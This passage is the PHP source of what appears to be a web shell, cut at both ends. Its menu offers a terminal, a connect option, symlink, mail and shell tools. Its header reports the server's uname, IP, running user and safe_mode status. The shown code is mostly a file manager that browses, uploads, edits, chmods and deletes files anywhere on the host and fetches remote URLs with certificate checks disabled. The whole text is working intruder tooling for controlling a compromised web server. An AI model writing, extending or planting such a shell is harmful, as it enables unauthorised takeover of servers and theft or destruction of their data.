closedir($h);
}
return chmod($x, $y);
} elseif (is_file($x)) {
return chmod($x, $y);
}
return false;
}
function CopyRecursive($x, $y)
{
if (is_dir($x)) {
@mkdir($y);
if ($h = @opendir($x)) {
while (false !== ($f = readdir($h))) {
if ($f != "." && $f != "..") {
CopyRecursive($x . _ . $f, $y . _ . $f);
}
}
closedir($h);
}
return true;
} elseif (is_file($x)) {
return copy($x, $y);
}
return false;
}
function MoveRecursive($x, $y)
{
if (is_dir($x)) {
@mkdir($y);
if ($h = @opendir($x)) {
while (false !== ($f = readdir($h))) {
if ($f != "." && $f != "..") {
MoveRecursive($x . _ . $f, $y . _ . $f);
}
}
closedir($h);
}
return Remove($x);
} elseif (is_file($x)) {
if (copy($x, $y)) {
return unlink($x);
}
}
return false;
}
function GetDownloadUrl($x, $y)
{
global $agent;
$fl = fopen($y, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_FILE, $fl);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$rs = curl_exec($ch);
if (curl_error($ch)) {
return curl_error($ch);
}
curl_close($ch);
fclose($fl);
return true;
}
function GetUrlExists($x)
{
global $agent;
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (curl_error($ch)) {
return curl_error($ch);
}
curl_close($ch);
return $http >= 200 && $http < 300;
}
function GetUrlContent($x)
{
global $agent;
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($ch);
if (curl_error($ch)) {
return curl_error($ch);
}
curl_close($ch);
return $rs;
}
function GetUrlFromPath($x)
{
$fix_path = str_replace(_, '/', $x);
$protocol = empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] === 'off' ? 'http://' : 'https://';
$path = str_replace(document_root, '', $fix_path);
return $protocol . server_name . $path;
}
function PostUrlContent($url, $content)
{
global $agent;
$params = array('http' => array('method' => "POST", 'header' => "Content-Type: application/x-www-form-urlencoded\r\n" . "User-Agent: {$agent}\r\n", 'content' => http_build_query($content)));
$results = "";
$context = stream_context_create($params);
$header = get_headers($url);
if ($http = substr($header[0], 9, 3) != "200") {
$results = "Error: {$http}";
} else {
//file_get_contents
if ($contents = file_get_contents($url, null, $context)) {
$results = htmlspecialchars($contents);
}
//stream_get_contents
if ($handle = fopen($url, 'r', false, $context)) {
$contents = stream_get_contents($handle);
fclose($handle);
$results = htmlspecialchars($contents);
}
//fopen
if ($handle = fopen($url, 'r', false, $context)) {
$contents = "";
while (!feof($handle)) {
$contents .= fread($handle, 10240);
}
fclose($handle);
$results = htmlspecialchars($contents);
}
}
return $results;
}
function GetFileType($x)
{
if (is_file($x)) {
return pathinfo($x)['extension'];
} elseif (is_dir($x)) {
return "dir";
} elseif (is_link($x)) {
return "link";
} else {
return "-";
}
}
function GetFileTime($x, $y)
{
switch ($y) {
case "create":
return date("Y-m-d H:i:s", @filectime($x));
case "modify":
return date("Y-m-d H:i:s", @filemtime($x));
case "access":
return date("Y-m-d H:i:s", @fileatime($x));
}
}
function GetFilePerm($x)
{
$perms = @fileperms($x);
switch ($perms & 0xf000) {
case 0xc000:
$info = 's';
break;
case 0xa000:
$info = 'l';
break;
case 0x8000:
$info = 'r';
break;
case 0x6000:
$info = 'b';
break;
case 0x4000:
$info = 'd';
break;
case 0x2000:
$info = 'c';
break;
case 0x1000:
$info = 'p';
break;
default:
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return sprintf('%s [%s]', $info, substr(decoct($perms), 2));
}
function GetFileSize($x)
{
$x = abs($x);
$size = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
$exp = $x ? floor(log($x) / log(1024)) : 0;
return sprintf('%.2f ' . $size[$exp], $x / pow(1024, floor($exp)));
}
function GetUser($x)
{
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$uid = posix_getpwuid(posix_getuid());
$gid = posix_getgrgid(posix_getgid());
switch ($x) {
case 'usr':
return $uid['name'];
case 'uid':
return $uid['uid'];
case 'grp':
return $gid['name'];
case 'gid':
return $gid['gid'];
}
} else {
switch ($x) {
case 'usr':
return get_current_user();
case 'uid':
return getmyuid();
case 'grp':
return "?";
case 'gid':
return getmygid();
}
}
}
function GetOwnerGroup($x)
{
if (Unix()) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$user = posix_getpwuid(fileowner($x));
$group = posix_getgrgid(filegroup($x));
return sprintf('%s:%s', $user['name'], $group['name']);
}
}
return "?:?";
}
function GetFileOwnerGroup($x)
{
if (Unix()) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$user = posix_getpwuid(fileowner($x));
$group = posix_getgrgid(filegroup($x));
return sprintf('%s:%s/%s:%s', $user['name'], $user['uid'], $group['name'], $group['gid']);
}
}
return "?:?/?:?";
}
function GetSafeMode()
{
if (strtolower(ini_get("safe_mode")) == 'on') {
$safemod = "<font class='off'>ON</font>";
} else {
$safemod = "<font class='on'>OFF</font>";
}
return $safemod;
}
function MapDirectory($x)
{
$map = "";
$d = str_replace("\\", _, $x);
if (empty($d)) {
$d = realpath(".");
} elseif (realpath($d)) {
$d = realpath($d);
}
$d = str_replace("\\", _, $d);
if (substr($d, -1) != _) {
$d .= _;
}
$d = str_replace("\\\\", "\\", $d);
$pd = $e = explode(_, substr($d, 0, -1));
$i = 0;
foreach ($pd as $b) {
$t = "";
$j = 0;
foreach ($e as $r) {
$t .= $r . _;
if ($j == $i) {
break;
}
$j++;
}
$map .= "<a href=\"?d=" . urle($t) . "\" >" . htmlspecialchars($b) . "</a>" . _;
$i++;
}
return rtrim($map, _);
}
function MapDrive($x)
{
if (!Unix()) {
$v = explode("\\", $x);
$v = $v[0];
$l = "";
foreach (range("A", "Z") as $lt) {
$drive = is_dir($lt . ":\\");
if ($drive) {
$l .= "<a href=\"?d=" . urle($lt . ":\\") . "\">[";
if (strtolower($lt . ':') != strtolower($v)) {
$l .= $lt;
} else {
$l .= "<font color=\"orange\"><b>" . $lt . "</b></font>";
}
$l .= "]</a>";
}
}
return $l;
}
}
function MainMenu()
{
$menu = array("ExpL" => "?d=" . urle(getcwd()), "★ Sec." => "?x=secure", "Info" => "?x=info", "Database" => "?x=db", "Terminal" => "?x=terminal", "Connect" => "?x=connect", ".Htaccess" => "?x=htaccess", "PHP" => "?x=php", "Perl/CGI" => "?x=perl", "Mail" => "?x=mail", "Process" => "?x=process", "Shells" => "?x=shells", "Symlink" => "?x=symlink", "♛ Tools" => "?z", "Account" => "?x=account", "Update" => "?x=update", "Logout" => "?x=logout");
$nu = "";
foreach ($menu as $key => $val) {
$idxkey = substr($val, 1, 1);
$idxval = substr($val, 3);
$active = any($idxkey, $_REQUEST) && $_REQUEST[$idxkey] == $idxval ? "class='active'" : "";
if ($key == "Logout") {
$nu .= "<li><a " . $active . " href='" . $val . "' onclick=\"return confirm('Bye !');\">" . $key . "</a></li>";
} else {
$nu .= "<li><a " . $active . " href='" . $val . "'>" . $key . "</a></li>";
}
}
return $nu;
}
function MenuTools($x)
{
global $menu_tools;
$ol = "<div class='menu-tools'><ul>";
$menu_tools = $x;
foreach ($menu_tools as $k => $v) {
$active = $_REQUEST['z'] == $k ? "class='active'" : "";
$ol .= "<li><a " . $active . " href='?z=" . $k . "'>[" . $v['title'] . "]</a></li>";
}
$ol .= "</ul></div>";
return $ol;
}
printf("<div id='header'>\r\n\t\t<div class='header-left'>\r\n\t\t\t<div id='info'>\r\n\t\t\t\t<font class='on'>[%s]</font><br>\r\n\t\t\t\t<font class='on'>[%s]</font><br>\r\n\t\t\t\t[<a href='//%s' target='_blank'>%s</a>]: <font class='on'>%s:%s</font> [%s]: <font class='on'>%s:%s</font><br>\r\n\t\t\t\t[USER]: <font class='on'>%s(%s)</font> [GROUP]: <font class='on'>%s(%s)</font><br>\r\n\t\t\t\t[HDD]: <font class='on'>%s</font> / <font class='on'>%s</font><br>\r\n\t\t\t\t[PHPMODE]: <font class='on'>%s</font><br>\r\n\t\t\t\t[SAFEMODE]: <font class='on'>%s</font><br>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t\t<div class='header-right'>\r\n\t\t\t<a href='%s'><div id='logo'>\r\n\t\t\t\t<h1 id='title'>%s</h1>\r\n\t\t\t\t<div class='line'></div>\r\n\t\t\t\t<h2 id='subtitle'>%s</h2>\r\n\t\t\t</div></a>\r\n\t\t</div>\r\n\t\t<div class='clr'></div>\r\n\t\t</div>\r\n\t\t<div id='container'>\r\n\t\t<div class='menu'>\r\n\t\t\t<ul>%s</ul>\r\n\t\t</div>\r\n\t\t<div class='menu-directory'>\r\n\t\t\t<div class='map-switch'>\r\n\t\t\t\t<input type='submit' name='map-switch' value='♞' onclick='mapSwitch(\"map1\",\"map2\")'>\r\n\t\t\t</div>\r\n\t\t\t<div class='map1' id='map1' style='display:inline-block'>\r\n\t\t\t\t<span style='margin-right:5px'>%s</span>\r\n\t\t\t\t<span style='margin-right:5px'>%s</span>\r\n\t\t\t</div>\r\n\t\t\t<div class='map2' id='map2' style='display:none'>\r\n\t\t\t\t<form method='post' id='map2-form' onsubmit='document.getElementById(\"map2-form\").action=\"?g=\" + encodeURI(document.getElementById(\"map2-input\").value);'>\r\n\t\t\t\t\t<input type='text' value='%s' id='map2-input'/>\r\n\t\t\t\t\t<input type='submit' value='Go'>\r\n\t\t\t\t</form>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t\t<div class='content'>", php_uname(), server_software, server_name, server_name, gethostbyname(http_host), server_port, B64D($account[0]), remote_addr, remote_port, GetUser("usr"), GetUser("uid"), GetUser("grp"), GetUser("gid"), GetFileSize(@disk_free_space($dir)), GetFileSize(@disk_total_space($dir)), php_sapi_name(), GetSafeMode(), php_self, $config['title'], $config['subtitle'], MainMenu(), MapDrive($map), MapDirectory($map), $map);
if (any("g", $_REQUEST)) {
$g = $_REQUEST['g'];
if (is_dir($g)) {
header("location:php_self?d=" . urle($g));
} elseif (is_file($g) || is_link($g)) {
header("location:php_self?a=v&r=" . urle($g));
} else {
header("location:php_self");
}
}
if (any("d", $_REQUEST) || false) {
$_SESSION['c'] = urle($dir);
if (any("file", $_REQUEST) && $_REQUEST['file'] == "New File") {
$file = trim($dir . _ . $_REQUEST['what']);
if (file_exists($file)) {
printf("<center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center>");
} else {
$mf = @fopen($file, "w");
fclose($mf);
header("location:php_self?a=e&r=" . urle($file));
}
}
if (any("directory", $_REQUEST) && $_REQUEST['directory'] == "New Dir") {
$dire = trim($_REQUEST['what']);
@chdir($dir);
if (!@mkdir($dire)) {
printf("<center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center>");
} else {
printf("<center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center>", $dire, GetFileTime($dir . _ . $dire, 'create'));
}
}
if (any("upload", $_REQUEST) && $_REQUEST['upload'] == "Upload") {
$upload = $dir . _ . trim(basename($_FILES["what"]["name"]));
if (move_uploaded_file($_FILES["what"]["tmp_name"], $upload)) {
printf("<center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center>", basename($_FILES["what"]["name"]));
} else {
printf("<center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center>");
}
}
if ($handle = @opendir($dir)) {
$reads = array();
$count_dirs = 0;
$count_files = 0;
while (false !== ($file = readdir($handle))) {
$filedir = rtrim($dir, _) . _ . $file;
$updir = substr($dir, 0, strrpos($dir, _));
if (strlen($updir) <= 2) {
$updir .= _;
}
$type = GetFileType($filedir);
$size = GetFileSize(@filesize($filedir));
$last = GetFileTime($filedir, "modify");
$perm = GetFilePerm($filedir);
$owner = GetOwnerGroup($filedir);
$mime = @mime_content_type($filedir);
$view = "";
if (strpos($mime, 'image') !== false) {
$view = "?a=v&w=i&r=" . urle($filedir);
} elseif (strpos($mime, 'video') !== false) {
$view = "?a=v&w=v&r=" . urle($filedir);
} elseif (strpos($mime, 'audio') !== false) {
$view = "?a=v&w=a&r=" . urle($filedir);
} else {
$view = "?a=v&r=" . urle($filedir);
}
if ($file == ".") {
$reads[] = "<tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value='" . urle($dir) . "'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Current Directory' href='?d=" . urle($dir) . "'>.</a></td><td><center>" . strtoupper($type) . "</center></td><td><center>" . $size . "</center></td><td><center>" . $perm . "</center></td><td><center>" . $owner . "</center></td><td><center>" . $last . "</center></td><td><a class='action' href='?a=x&r=" . urle($dir) . "' onclick=\"return confirm('Delete Directory [ /" . basename($dir) . " ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=" . urle($dir) . "' title='Modify Folder'>ℳ</a></td></tr>";
} elseif ($file == "..") {
$reads[] = "<tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value='" . urle($updir) . "'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAmlJREFUeNpsU0toU0EUPfPysx/tTxuDH9SCWhUDooIbd7oRUUTMouqi2iIoCO6lceHWhegy4EJFinWjrlQUpVm0IIoFpVDEIthm0dpikpf3ZuZ6Z94nrXhhMjM3c8895977BBHB2PznK8WPtDgyWH5q77cPH8PpdXuhpQT4ifR9u5sfJb1bmw6VivahATDrxcRZ2njfoaMv+2j7mLDn93MPiNRMvGbL18L9IpF8h9/TN+EYkMffSiOXJ5+hkD+PdqcLpICWHOHc2CC+LEyA/K+cKQMnlQHJX8wqYG3MAJy88Wa4OLDvEqAEOpJd0LxHIMdHBziowSwVlF8D6QaicK01krw/JynwcKoEwZczewroTvZirlKJs5CqQ5CG8pb57FnJUA0LYCXMX5fibd+p8LWDDemcPZbzQyjvH+Ki1TlIciElA7ghwLKV4kRZstt2sANWRjYTAGzuP2hXZFpJ/GsxgGJ0ox1aoFWsDXyyxqCs26+ydmagFN/rRjymJ1898bzGzmQE0HCZpmk5A0RFIv8Pn0WYPsiu6t/Rsj6PauVTwffTSzGAGZhUG2F06hEc9ibS7OPMNp6ErYFlKavo7MkhmTqCxZ/jwzGA9Hx82H2BZSw1NTN9Gx8ycHkajU/7M+jInsDC7DiaEmo1bNl1AMr9ASFgqVu9MCTIzoGUimXVAnnaN0PdBBDCCYbEtMk6wkpQwIG0sn0PQIUF4GsTwLSIFKNqF6DVrQq+IWVrQDxAYQC/1SsYOI4pOxKZrfifiUSbDUisif7XlpGIPufXd/uvdvZm760M0no1FZcnrzUdjw7au3vu/BVgAFLXeuTxhTXVAAAAAElFTkSuQmCC'/> <a title='Parent Directory' href='?d=" . urle($updir) . "'>" . $file . "</a></td><td><center>" . strtoupper($type) . "</center></td><td><center>" . $size . "</center></td><td><center>" . $perm . "</center></td><td><center>" . $owner . "</center></td><td><center>" . $last . "</center></td><td><a class='action' href='?a=x&r=" . urle($updir) . "' onclick=\"return confirm('Delete Directory [ /" . basename($updir) . " ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=" . urle($updir) . "' title='Modify Folder'>ℳ</a></td></tr>";
} else {
if ($type == "dir") {
$reads[] = "<tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value='" . urle($filedir) . "' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Open Directory' href='?d=" . urle($filedir) . "'>" . $file . "</a></td><td><center>" . strtoupper($type) . "</center></td><td><center>" . $size . "</center></td><td><center>" . $perm . "</center></td><td><center>" . $owner . "</center></td><td><center>" . $last . "</center></td><td><a class='action' href='?a=x&r=" . urle($filedir) . "' onclick=\"return confirm('Delete Directory [ /" . basename($filedir) . " ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=" . urle($filedir) . "' title='Modify Folder'>ℳ</a></td></tr>";
$count_dirs++;
} else {
$reads[] = "<tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value='" . urle($filedir) . "' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAABnRSTlMAAAAAAABupgeRAAABHUlEQVR42o2RMW7DIBiF3498iHRJD5JKHurL+CRVBp+i2T16tTynF2gO0KSb5ZrBBl4HHDBuK/WXACH4eO9/CAAAbdvijzLGNE1TVZXfZuHg6XCAQESAZXbOKaXO57eiKG6ft9PrKQIkCQqFoIiQFBGlFIB5nvM8t9aOX2Nd18oDzjnPgCDpn/BH4zh2XZdlWVmWiUK4IgCBoFMUz9eP6zRN75cLgEQhcmTQIbl72O0f9865qLAAsURAAgKBJKEtgLXWvyjLuFsThCSstb8rBCaAQhDYWgIZ7myM+TUBjDHrHlZcbMYYk34cN0YSLcgS+wL0fe9TXDMbY33fR2AYBvyQ8L0Gk8MwREBrTfKe4TpTzwhArXWi8HI84h/1DfwI5mhxJamFAAAAAElFTkSuQmCC'> <a title='View File' href='" . $view . "'>" . $file . "</a></td><td><center>" . strtoupper($type) . "</center></td><td><center>" . $size . "</center></td><td><center>" . $perm . "</center></td><td><center>" . $owner . "</center></td><td><center>" . $last . "</center></td><td><a class='action' href='?a=e&r=" . urle($filedir) . "' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r=" . urle($filedir) . "' onclick=\"return confirm('Delete Filename [ " . basename($filedir) . " ] ?');\" title='Delete File'>✘</a> <a class='action' href='?a=d&r=" . urle($filedir) . "' title='Download File'>➥</a></td></tr>";
$count_files++;
}
}
}
sort($reads);
$filesdirs = "";
foreach ($reads as $read) {
$filesdirs .= $read;
}
printf("<div id='action'>\r\n\t\t\t\t\t<table><tr>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s'>\r\n\t\t\t\t\t\t<input name='what' type='text' /><input type='submit' name='file' value='New File'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s'>\r\n\t\t\t\t\t\t<input name='what' type='text' /><input type='submit' name='directory' value='New Dir'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value' id='find-action'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s&x=upload' enctype='multipart/form-data'>\r\n\t\t\t\t\t\t<input name='what' type='file' class='inputfile'/><input type='submit' name='upload' value='Upload'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t</tr></table>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div id='home'>\r\n\t\t\t\t\t<form name='files' method=POST action='?x=action' onclick='checkCount(\"count\")'>\r\n\t\t\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_nosort'><input type='checkbox' name='check-all' onclick='checkAll()'/></th>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_numeric'>Name</th>\r\n\t\t\t\t\t\t\t\t\t<th>Type</th>\r\n\t\t\t\t\t\t\t\t\t<th>Size</th>\r\n\t\t\t\t\t\t\t\t\t<th>Perms</th>\r\n\t\t\t\t\t\t\t\t\t<th>Owner:Group</th>\r\n\t\t\t\t\t\t\t\t\t<th>Modified</th>\r\n\t\t\t\t\t\t\t\t\t<th>Act.</th>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t<tFoot>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<td colspan='8'>[<span id='count'>0</span>] Selected | Dir's: [%s] File's: [%s]</td>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t</tFoot>\r\n\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t<select name='action-value'>\r\n\t\t\t\t\t\t\t<option value='copy'>Copy</option>\r\n\t\t\t\t\t\t\t<option value='move'>Move</option>\r\n\t\t\t\t\t\t\t<option value='delete'>Delete</option>\r\n\t\t\t\t\t\t\t<option value='zip'>Archive (zip)</option>\r\n\t\t\t\t\t\t\t<option value='unzip'>Extract to (zip)</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t\t<input type='submit' value='Action' name='action-button' />\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>", urle($dir), urle($dir), urle($dir), $filesdirs, $count_dirs, $count_files);
closedir($handle);
} else {
print "<center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center>";
}
}
if (any("r", $_REQUEST)) {
if (file_exists(urld($_REQUEST["r"]))) {
$file = strval(urld($_REQUEST["r"]));
$status = any("status", $_SESSION) ? $_SESSION['status'] : "";
$back = "php_self?d=" . urle($dir);
printf("<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t<tr><td>Name</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Size</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Permission</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Create time</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Last modified</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Last accessed</td><td>%s</td></tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t<tr><td>MIME</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Owner/Group</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>MD5</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>SHA1</td><td>%s</td></tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\t\t\t</div>", basename($file), GetFileSize(@filesize($file)), GetFilePerm($file), GetFileTime($file, "create"), GetFileTime($file, "modify"), GetFileTime($file, "access"), mime_content_type($file), GetFileOwnerGroup($file), @md5_file($file), @sha1_file($file));
if (is_file($file) || is_link($file)) {
$menu = array("Back" => "?a=b&r=", "Edit" => "?a=e&r=", "View" => "?a=v&r=", "Copy" => "?a=cp&r=", "Move" => "?a=mv&r=", "Download" => "?a=d&r=", "Hexdump" => "?a=h&r=", "Chmod" => "?a=c&r=", "Chown" => "?a=cwn&r=", "Chgrp" => "?a=cgp&r=", "Touch" => "?a=t&r=", "Rename" => "?a=r&r=", "Delete" => "?a=x&r=");
} elseif (is_dir($file)) {
$menu = array("Back" => "?a=b&r=", "Chmod" => "?a=c&r=", "Chown" => "?a=cwn&r=", "Chgrp" => "?a=cgp&r=", "Touch" => "?a=t&r=", "Rename" => "?a=r&r=", "Delete" => "?a=x&r=");
}
$nu = "";
foreach ($menu as $key => $val) {
$idxkey = substr($val, 1, 1);
$idxval = substr($val, 3, strpos($val, '&') - 3);
$active = any($idxkey, $_REQUEST) && $_REQUEST[$idxkey] == $idxval ? "class='active'" : "";
if ($key == "Delete") {
$nu .= "<li><a " . $active . " href='" . $val . urle($file) . "' onclick=\"return confirm('Delete Filename [ " . basename($file) . " ] ?');\">" . $key . "</a></li>";
} elseif ($key == "Back") {
$nu .= "<li><a " . $active . " href='" . $back . "'>" . $key . "</a></li>";
} else {
$nu .= "<li><a " . $active . " href='" . $val . urle($file) . "'>" . $key . "</a></li>";
}
}
printf("<div class='menu'>\r\n\t\t\t<ul>%s</ul>\r\n\t\t</div>", $nu);
if ($_REQUEST['a'] == 'e') {
$source = "";
if (filesize($file) > 5242880) {
$source = "Lazy to Read more than 5MB Files";
} else {
$open = fopen($file, 'r');
if ($open) {
while (!feof($open)) {
$source .= htmlentities(fread($open, 4096));
}
fclose($open);
}
}
printf("<form class='frmsource' method='post'>\r\n\t\t\t\t\t<textarea id='sourcefocus' name='sourcecode' rows='25' cols='100'>%s</textarea>\r\n\t\t\t\t\t<input type='Submit' value='Save file' name='save'/>\r\n\t\t\t\t\t<label>%s</label>\r\n\t\t\t\t</form>", $source, $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("save", $_REQUEST)) {
$new_source = $_REQUEST['sourcecode'];
if (function_exists("chmod")) {
chmod($file, 0755);
}
$source_edit = fopen($file, 'w+');
$tulis = fwrite($source_edit, $new_source);
fclose($source_edit);
if ($tulis) {
$_SESSION['status'] = "File Saved ! " . GetFileTime($file, "modify") . " | " . GetFileSize(filesize($file));
} else {
$_SESSION['status'] = "Whoops, something went wrong...";
}
header("location:php_self?a=e&r=" . urle($file));
}
}
if ($_REQUEST['a'] == 'r') {
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='name' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Rename' name='rename'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", basename($file), $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("rename", $_REQUEST)) {
$path = pathinfo(trim($file));
$newname = $path['dirname'] . _ . trim($_REQUEST['name']);
if (!rename(trim($file), $newname)) {
$_SESSION['status'] = 'Whoops, something went wrong...';
} else {
$_SESSION['status'] = 'Renamed file with success';
}
header("location:php_self?a=r&r=" . urle($newname));
}
}
